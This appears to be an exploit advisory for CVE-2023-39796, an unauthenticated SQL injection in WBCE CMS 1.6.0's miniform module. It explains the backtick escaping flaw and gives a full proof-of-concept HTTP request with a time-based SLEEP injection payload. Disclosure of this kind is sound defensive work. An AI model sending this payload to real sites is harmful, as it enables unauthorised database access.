Security
Headlines
HeadlinesLatestCVEs

Headline

WBCE 1.6.0 SQL Injection

WBCE version 1.6.0 suffers from a remote SQL injection vulnerability.

Packet Storm
#sql#vulnerability#web#apple#linux#git#php#auth#chrome#webkit

Exploit Title: |Unauthenticated SQL injection in WBCE 1.6.0

Date: 15.11.2023

Exploit Author: young pope

Vendor Homepage: https://github.com/WBCE/WBCE_CMS

Software Link: https://github.com/WBCE/WBCE_CMS/archive/refs/tags/1.6.0.zip

Version: 1.6.0

Tested on: Kali linux

CVE : CVE-2023-39796

There is an sql injection vulnerability in miniform module which is a
default module installed in the WBCE cms. It is an unauthenticated
sqli so anyone could access it and takeover the whole database.

In file /modules/miniform/ajax_delete_message.php there is no
authentication check. On line |40| in this file, there is a |DELETE|
query that is vulnerable, an attacker could jump from the query using
tick sign - ```.

Function |addslashes()|
(https://www.php.net/manual/en/function.addslashes.php) escapes only
these characters and not a tick sign:

  • single quote (')
  • double quote (")
  • backslash ()
  • NUL (the NUL byte

The DB_RECORD_TABLE parameter is vulnerable.

If an unauthenticated attacker send this request:


POST /modules/miniform/ajax_delete_message.php HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML,   
like Gecko) Chrome/36.0.1985.125 Safari/537.36  
Connection: close  
Content-Length: 162  
Accept: */*  
Accept-Language: en  
Content-Type: application/x-www-form-urlencoded  
Accept-Encoding: gzip, deflate

action=delete&DB_RECORD_TABLE=miniform_data`+WHERE+1%3d1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+&iRecordID=1&DB_COLUMN=message_id&MODULE=&purpose=delete_record

The response is received after 6s.

Reference links:

  • https://nvd.nist.gov/vuln/detail/CVE-2023-39796
  • https://forum.wbce.org/viewtopic.php?pid=42046#p42046
  • https://github.com/WBCE/WBCE_CMS/releases/tag/1.6.1
  • https://pastebin.com/PBw5AvGp

Related news

CVE-2023-39796: Release WBCE CMS 1.6.1 · WBCE/WBCE_CMS

SQL injection vulnerability in the miniform module in WBCE CMS v.1.6.0 allows remote unauthenticated attacker to execute arbitrary code via the DB_RECORD_TABLE parameter.

Packet Storm: Latest News

Ivanti EPM Agent Portal Command Execution